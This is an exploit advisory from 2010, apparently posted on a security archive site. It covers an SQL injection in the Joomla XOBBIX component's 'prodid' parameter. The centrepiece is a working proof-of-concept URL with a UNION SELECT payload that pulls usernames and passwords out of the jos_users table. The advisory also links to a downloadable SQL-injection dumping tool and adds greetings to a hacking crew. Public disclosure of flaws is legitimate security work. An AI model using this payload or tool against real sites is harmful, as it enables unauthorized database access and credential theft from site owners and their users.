Joomla XOBBIX 1.0.x SQL Injection

Joomla XOBBIX 1.0.x SQL Injection: Posted Apr 6, 2010; Authored by AntiSecurity; The Joomla XOBBIX component version 1.0.x suffers from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; SHA-256 | 10e3f52f3db0df99a4fb2f3ee1abe82dfbd42d51099342676abca55780a91e18; Download | Favorite | View

Joomla XOBBIX 1.0.x SQL Injection


===============================================================================================================


  [o] Joomla Component XOBBIX [prodid] SQL Injection Vulnerability
 
       Software : com_xobbix version 1.0.x
       Vendor   : http://www.php-shop-system.com/
       Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
       Contact  : public[dot]antisecurity[dot]org
       Home     : http://antisecurity.org/


===============================================================================================================


  [o] Exploit

       http://localhost/[path]/index.php?option=com_xobbix&catid=32&task=prod_desc&prodid=25


  [o] PoC

       http://localhost/index.php?option=com_xobbix&catid=31&task=prod_desc&prodid=-21+union+select+1,2,3,4,group_concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16+from+jos_users--


  [o] Tool

       Simple SQLi Dumper v5.1
       http://c0li.info/xpl/ssdp51.tar.gz
       http://evilc0de.blogspot.com/2010/03/simple-sqli-dumper-v51-how-to.html


===============================================================================================================


  [o] Greetz

       Angela Zhang stardustmemory aJe martfella pizzyroot Genex
       H312Y yooogy mousekill }^-^{ noname matthews s4va wishnusakti
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke


===============================================================================================================


  [o] April 06 2010 - GMT +07:00 Jakarta, Indonesia

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Joomla XOBBIX 1.0.x SQL Injection

Joomla XOBBIX 1.0.x SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Joomla XOBBIX 1.0.x SQL Injection

Share This

Joomla XOBBIX 1.0.x SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems